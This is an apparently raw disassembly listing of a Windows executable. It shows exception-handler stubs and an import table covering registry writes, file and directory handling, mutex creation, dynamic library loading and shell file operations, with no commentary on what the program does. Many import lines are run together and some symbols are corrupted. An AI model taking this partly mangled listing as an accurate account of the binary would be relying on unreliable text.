lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432254: ; DATA XREF: HLXc:00435524�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-3Ch]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_43227C: ; DATA XREF: sub_425AD2�o
mov eax, offset dword_4354F8
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_432288: ; DATA XREF: HLXc:00435574�o
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-40h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
and eax, 1
test eax, eax
jz locret_4322C6
mov ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
locret_4322C6: ; CODE XREF: HLXc:004322B8�j
retn
; ---------------------------------------------------------------------------
loc_4322C7: ; DATA XREF: sub_425C0B�o
mov eax, offset dword_435548
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_4322DC: ; DATA XREF: HLXc:004355C4�o
lea ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_4322EC: ; DATA XREF: sub_425D38�o
mov eax, offset dword_435598
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+8]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432300: ; DATA XREF: HLXc:004355FC�o
lea ecx, [ebp-14h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-34h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-74h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-54h]
jmp sub_426ABF
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp sub_431642
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp sub_431642
; ---------------------------------------------------------------------------
loc_432388: ; DATA XREF: sub_425FC6�o
mov eax, offset dword_4355D0
jmp sub_43169C
; ---------------------------------------------------------------------------
align 4
loc_432394: ; DATA XREF: sub_4263D6�o
mov eax, offset dword_4356A0
jmp sub_43169C
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
call sub_428230
retn
; ---------------------------------------------------------------------------
loc_4323A9: ; DATA XREF: HLXc:00426505�o
mov eax, offset dword_4356F8
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4323BC: ; DATA XREF: HLXc:0043574C�o
mov ecx, [ebp-18h]
call sub_428230
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_426584 proc near ; DATA XREF: sub_426584+5�o
mov eax, offset dword_435720
jmp sub_43169C
SEH_426584 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_428230
retn
; ---------------------------------------------------------------------------
loc_4323EA: ; DATA XREF: HLXc:0043578C�o
mov ecx, [ebp-10h]
add ecx, 10h
call sub_431642
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 14h
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432402: ; DATA XREF: HLXc:00426882�o
mov eax, offset dword_435760
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+0Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432415: ; DATA XREF: HLXc:004357C4�o
lea ecx, [ebp+8]
call sub_431642
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
call sub_428230
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 10h
call sub_431642
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-1Ch]
add ecx, 14h
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-14h]
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_42692B proc near ; DATA XREF: sub_42692B+5�o
mov eax, offset dword_435798
jmp sub_43169C
SEH_42692B endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_428230
retn
; ---------------------------------------------------------------------------
loc_432464: ; DATA XREF: HLXc:0043581C�o
mov ecx, [ebp-10h]
add ecx, 10h
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_426ABF proc near ; DATA XREF: sub_426ABF+5�o
mov eax, offset dword_4357F0
jmp sub_43169C
SEH_426ABF endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_426B19 proc near ; DATA XREF: sub_426B19+5�o
mov eax, offset dword_435820
jmp sub_43169C
SEH_426B19 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_426DB8 proc near ; DATA XREF: sub_426DB8+5�o
mov eax, offset dword_435848
jmp sub_43169C
SEH_426DB8 endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-30h]
call sub_428230
retn
; ---------------------------------------------------------------------------
loc_4324A9: ; DATA XREF: HLXc:00426E5D�o
mov eax, offset dword_435870
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4324BC: ; DATA XREF: HLXc:004358C4�o
mov ecx, [ebp-38h]
call sub_428230
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-24h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4324D7: ; DATA XREF: HLXc:00426F3D�o
mov eax, offset dword_435898
jmp sub_43169C
; ---------------------------------------------------------------------------
mov ecx, [ebp-20h]
call sub_428230
retn
; ---------------------------------------------------------------------------
loc_4324EA: ; DATA XREF: HLXc:004273C4�o
mov eax, offset dword_4358D8
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4324FD: ; DATA XREF: HLXc:0043592C�o
mov ecx, [ebp-28h]
call sub_428230
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432518: ; DATA XREF: HLXc:00427480�o
mov eax, offset dword_435900
jmp sub_43169C
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
call sub_4284A0
retn
; ---------------------------------------------------------------------------
loc_43252B: ; DATA XREF: HLXc:0043596C�o
mov ecx, [ebp-18h]
add ecx, 28h
call dword_433168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-18h]
add ecx, 38h
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_432545: ; DATA XREF: HLXc:0042789A�o
mov eax, offset dword_435940
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+18h]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_432559: ; DATA XREF: HLXc:004359A4�o
lea ecx, [ebp+8]
call dword_433168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
call sub_4284A0
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_433168
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_433168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
call dword_433168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_43259A: ; DATA XREF: HLXc:00427957�o
mov eax, offset dword_435978
jmp sub_43169C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_4284A0
retn
; ---------------------------------------------------------------------------
loc_4325AD: ; DATA XREF: HLXc:004359FC�o
mov ecx, [ebp-10h]
add ecx, 28h
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_4325BA: ; DATA XREF: HLXc:00427ACC�o
mov eax, offset dword_4359D0
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_4325CE: ; DATA XREF: HLXc:00427D26�o
mov eax, offset dword_435A00
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_4325E2: ; DATA XREF: HLXc:00427E0A�o
mov eax, offset dword_435A28
jmp sub_43169C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
call sub_4284A0
retn
; ---------------------------------------------------------------------------
loc_4325F5: ; DATA XREF: HLXc:00427EB1�o
mov eax, offset dword_435A50
jmp sub_43169C
; ---------------------------------------------------------------------------
lea ecx, [ebp+8]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_432609: ; DATA XREF: HLXc:00435AA4�o
mov ecx, [ebp-34h]
call sub_4284A0
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-20h]
call dword_433168
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-30h]
call dword_433168
retn
; ---------------------------------------------------------------------------
loc_432626: ; DATA XREF: HLXc:00427F36�o
mov eax, offset dword_435A78
jmp sub_43169C
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 8
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_4281D0 proc near ; DATA XREF: sub_4281D0+5�o
mov eax, offset dword_435AB8
jmp sub_43169C
SEH_4281D0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 8
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_428230 proc near ; DATA XREF: sub_428230+5�o
mov eax, offset dword_435AE0
jmp sub_43169C
SEH_428230 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-18h]
add ecx, 8
call dword_433168
retn
; =============== S U B R O U T I N E =======================================
SEH_428440 proc near ; DATA XREF: sub_428440+5�o
mov eax, offset dword_435B08
jmp sub_43169C
SEH_428440 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 8
call dword_433168
retn
; =============== S U B R O U T I N E =======================================
SEH_4284A0 proc near ; DATA XREF: sub_4284A0+5�o
mov eax, offset dword_435B30
jmp sub_43169C
SEH_4284A0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 4
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4326BC: ; DATA XREF: HLXc:00435B84�o
mov ecx, [ebp-10h]
add ecx, 8
call sub_422BB1
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 203Ch
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_429830 proc near ; DATA XREF: sub_429830+5�o
mov eax, offset dword_435B58
jmp sub_43169C
SEH_429830 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-10h]
add ecx, 4
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4326FC: ; DATA XREF: HLXc:00435BBC�o
mov ecx, [ebp-10h]
add ecx, 8
call sub_422BB1
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
add ecx, 203Ch
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_4298B0 proc near ; DATA XREF: sub_4298B0+5�o
mov eax, offset dword_435B90
jmp sub_43169C
SEH_4298B0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-20h]
call sub_42414A
retn
; ---------------------------------------------------------------------------
loc_432739: ; DATA XREF: HLXc:00435BF4�o
lea ecx, [ebp-1Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-18h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_4264A2
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-1F9Ch]
call sub_429DB0
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27ACh]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27B0h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27B8h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27BCh]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27C0h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27C4h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27C8h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27CCh]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D0h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D4h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27D8h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27DCh]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E0h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E4h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27E8h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27ECh]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27F0h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-27F8h]
call sub_431642
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-38h]
call sub_429CA0
retn
; ---------------------------------------------------------------------------
mov ecx, [ebp-2800h]
call sub_42414A
retn
; =============== S U B R O U T I N E =======================================
SEH_42852F proc near ; DATA XREF: sub_42852F+5�o
mov eax, offset dword_435BC8
jmp sub_43169C
SEH_42852F endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-4014h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_43286C: ; DATA XREF: HLXc:00435CE4�o
lea ecx, [ebp-8024h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432878: ; DATA XREF: HLXc:00435CEC�o
lea ecx, [ebp-8028h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432884: ; DATA XREF: HLXc:00435CF4�o
lea ecx, [ebp-802Ch]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_432890: ; DATA XREF: HLXc:00435CFC�o
lea ecx, [ebp-8030h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_43289C: ; DATA XREF: HLXc:00435D04�o
lea ecx, [ebp-8034h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4328A8: ; DATA XREF: HLXc:00435D0C�o
lea ecx, [ebp-8038h]
call sub_431642
retn
; ---------------------------------------------------------------------------
loc_4328B4: ; DATA XREF: HLXc:00435D14�o
lea ecx, [ebp-803Ch]
call sub_431642
retn
; =============== S U B R O U T I N E =======================================
SEH_42908F proc near ; DATA XREF: sub_42908F+5�o
mov eax, offset dword_435CB8
jmp sub_43169C
SEH_42908F endp
; =============== S U B R O U T I N E =======================================
SEH_4294E5 proc near ; DATA XREF: sub_4294E5+5�o
mov eax, offset dword_435D18
jmp sub_43169C
SEH_4294E5 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-14h]
push eax
call sub_43161E
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_429980 proc near ; DATA XREF: sub_429980+5�o
mov eax, offset dword_435D70
jmp sub_43169C
SEH_429980 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1Ch]
call sub_429CA0
retn
; =============== S U B R O U T I N E =======================================
SEH_429B00 proc near ; DATA XREF: sub_429B00+5�o
mov eax, offset dword_435D98
jmp sub_43169C
SEH_429B00 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp+8]
call sub_42414A
retn
; =============== S U B R O U T I N E =======================================
SEH_429D20 proc near ; DATA XREF: sub_429D20+5�o
mov eax, offset dword_435DC0
jmp sub_43169C
SEH_429D20 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [ebp-1Ch]
push eax
call sub_43161E
pop ecx
retn
; =============== S U B R O U T I N E =======================================
SEH_43110B proc near ; DATA XREF: sub_43110B+5�o
mov eax, offset dword_435DE8
jmp sub_43169C
SEH_43110B endp
; ---------------------------------------------------------------------------
align 4
dd 1AAh dup(0)
dword_433000 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4266E9+8E�r ...
dword_433004 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_426B19+45�r ...
dword_433008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_426CC3+74�r ...
dword_43300C dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_426CC3+36�r ...
dword_433010 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_426B19+79�r ...
align 8
dword_433018 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; HLXc:00421665�r ...
dword_43301C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_42146A+12A�r ...
dword_433020 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; HLXc:004217F5�r ...
dword_433024 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_433028 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_42146A+99�r ...
dword_43302C dd 7C834FFEh ; resolved to->KERNEL32.GetCurrentDirectoryA ; HLXc:0042212B�r ...
dword_433030 dd 7C8217ACh ; resolved to->KERNEL32.CreateDirectoryA ; sub_4307DB+FD�r
dword_433034 dd 7C85B219h ; resolved to->KERNEL32.RemoveDirectoryAdword_433038 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesAdword_43303C dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesAdword_433040 dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_4221DB+98�r ...
dword_433044 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_433048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_4249D2+18�r
dword_43304C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFree ; sub_4227A4+36�r ...
dword_433050 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_4308E2+445�r
dword_433054 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_4263D6+9C�r
dword_433058 dd 7C8123B9h ; resolved to->KERNEL32.GlobalReAllocdword_43305C dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_433060 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4227A4+82�r ...
dword_433064 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_433068 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_43306C dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_433070 dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_433074 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_433078 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_422C48+28�r ...
dword_43307C dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_421C92+71�r ...
dword_433080 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_433084 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_433088 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_43308C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_433090 dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_433094 dd 7C83214Eh ; resolved to->KERNEL32.DosDateTimeToFileTimedword_433098 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_43309C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_42E429+6D�r
dword_4330A0 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4330A4 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; sub_42FFCE+59�r ...
dword_4330A8 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_42E61F+27�r ...
dword_4330AC dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_4330B0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4330B4 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_424AE5+12D�r ...
dword_4330B8 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationAdword_4330BC dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4330C0 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_4330C4 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrementdword_4330C8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_42852F+75C�r
dword_4330CC dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_422EC3+C�r ...
dword_4330D0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4330D4 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryA ; sub_424AE5+166�r
dword_4330D8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4330DC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_4263D6+27�r
dword_4330E0 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_422A1E+C8�r ...
align 8
dword_4330E8 dd 73E267E1h dword_4330EC dd 73E266E6h dword_4330F0 dd 73E263DEh dword_4330F4 dd 73DD6672h dword_4330F8 dd 73E2D6BFh dword_4330FC dd 73DD493Dh dword_433100 dd 73DD27B2h dword_433104 dd 73DD418Ch dword_433108 dd 73DD2831h dword_43310C dd 73E2654Dh dword_433110 dd 73E26465h dword_433114 dd 73DEBD63h dword_433118 dd 73DD47A8h dword_43311C dd 73DD265Ch dword_433120 dd 73DD496Bh dword_433124 dd 73DD2709h dword_433128 dd 73DD41F5h dword_43312C dd 73DD4391h dword_433130 dd 73E2C2B3h dword_433134 dd 73DD433Ah dword_433138 dd 73DD4123h align 10h
dword_433140 dd 401204h dword_433144 dd 401F3Eh ; HLXc:00421419�r
dword_433148 dd 401891h dword_43314C dd 404A51h ; HLXc:004213CE�r
dword_433150 dd 401888h ; HLXc:004213E0�r
dword_433154 dd 405384h ; HLXc:00421426�r
dword_433158 dd 401E51h ; HLXc:00431C27�r
dword_43315C dd 4038E0h dword_433160 dd 403B9Ah align 8
dword_433168 dd 7608F485h ; HLXc:00427A7C�r ...
dword_43316C dd 7608F470h ; HLXc:004278E0�r ...
dword_433170 dd 7609F0F5h ; HLXc:00427A52�r ...
dword_433174 dd 76085B0Ch ; HLXc:00427F9E�r
dword_433178 dd 760AC190h ; HLXc:00427A3B�r ...
dword_43317C dd 760A06A9h ; HLXc:00427A28�r ...
dword_433180 dd 7609F015h ; sub_427B23+12C�r ...
dword_433184 dd 76081F8Bh dword_433188 dd 7608B84Ch ; sub_427B23+58�r ...
dword_43318C dd 76085828h dword_433190 dd 76090F65h dword_433194 dd 76097647h ; HLXc:00427906�r ...
dd 0
dword_43319C dd 77C47A90h ; resolved to->MSVCRT.strncpy ; HLXc:004310F2�r
dword_4331A0 dd 77C1BE7Bh ; resolved to->MSVCRT.atoldword_4331A4 dd 77C4AEA3h ; resolved to->MSVCRT.time ; sub_4255E6+AA�r ...
dword_4331A8 dd 77C1BF18h ; resolved to->MSVCRT.atoi ; sub_425FC6+311�r
dword_4331AC dd 77C464BFh ; resolved to->MSVCRT._strnicmp ; sub_425D38+1ED�r ...
dword_4331B0 dd 77C46125h ; resolved to->MSVCRT._strdupdword_4331B4 dd 77C32D22h ; resolved to->MSVCRT._mbsuprdword_4331B8 dd 77C46040h ; resolved to->MSVCRT.strcatdword_4331BC dd 77C22738h ; resolved to->MSVCRT._EH_prologdword_4331C0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_4331C4 dd 77C3F010h ; resolved to->MSVCRT.fopendword_4331C8 dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_42852F+988�r ...
dword_4331CC dd 77C47C60h ; resolved to->MSVCRT.strstrdword_4331D0 dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_4331D4 dd 77C2C21Bh ; resolved to->MSVCRT.free ; sub_42322C+110�r ...
dword_4331D8 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_4331DC dd 77C226F6h ; resolved to->MSVCRT._CxxThrowExceptiondword_4331E0 dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_422A1E+108�r ...
dword_4331E4 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_4331E8 dd 77C47FCCh ; resolved to->MSVCRT.wcslendword_4331EC dd 77C41574h ; resolved to->MSVCRT.ftell ; sub_4224B5+2E�r
dword_4331F0 dd 77C4139Ch ; resolved to->MSVCRT.fseek ; sub_4224B5+44�r
dword_4331F4 dd 77C1CAD7h ; resolved to->MSVCRT.toupper ; sub_42239F+6D�r ...
dword_4331F8 dd 77C478A0h ; resolved to->MSVCRT.strlendword_4331FC dd 77C46030h ; resolved to->MSVCRT.strcpydword_433200 dd 77C31FBDh ; resolved to->MSVCRT._mbsnbcpydword_433204 dd 77C31881h ; resolved to->MSVCRT._mbscmp ; sub_425AD2+D7�r ...
dword_433208 dd 77C2C0C3h ; resolved to->MSVCRT.callocdword_43320C dd 77C47730h ; resolved to->MSVCRT.strcmpdword_433210 dd 77C4AA2Dh ; resolved to->MSVCRT.gmtimedword_433214 dd 77C32BB0h ; resolved to->MSVCRT._mbsstrdword_433218 dd 77C21868h dword_43321C dd 77C34E51h ; resolved to->MSVCRT.__dllonexitdword_433220 dd 77C34DF8h ; resolved to->MSVCRT._onexitdword_433224 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_433228 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_43322C dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_433230 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_433234 dd 77C617ACh ; resolved to->MSVCRT._acmdlndword_433238 dd 77C39D67h ; resolved to->MSVCRT._inittermdword_43323C dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_433240 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_433244 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_433248 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_43324C dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_433250 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_433254 dd 77C411FBh ; resolved to->MSVCRT.freaddword_433258 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfp align 10h
dword_433260 dd 77126BFFh dword_433264 dd 77124920h ; sub_429CA0+B�r ...
dword_433268 dd 77124980h dword_43326C dd 77124CFAh dword_433270 dd 77124C98h dword_433274 dd 77124880h ; sub_42852F+805�r ...
dword_433278 dd 77124C7Eh ; sub_429AB0+17�r
dword_43327C dd 7712A63Fh dword_433280 dd 77124C05h align 8
dword_433288 dd 7CA70964h ; resolved to->SHELL32.SHFileOperationA ; sub_421C92+BB�r ...
align 10h
dword_433290 dd 7E41C4A9h ; resolved to->USER32.EqualRectdword_433294 dd 7E41C66Eh ; resolved to->USER32.CopyRectdword_433298 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_424AE5+2C8�r ...
dword_43329C dd 7E418D2Bh ; resolved to->USER32.CharUpperA dd 0
dword_4332A4 dd 774FEE36h dword_4332A8 dd 77502A37h ; sub_4294E5+E5�r
dword_4332AC dd 774FFAC3h dd 2 dup(0)
byte_4332B8 db 90h ; DATA XREF: sub_42852F+BF�o
db 0BFh, 33h, 29h
dd 11D27B36h, 0C0000EB2h, 603E984Fh
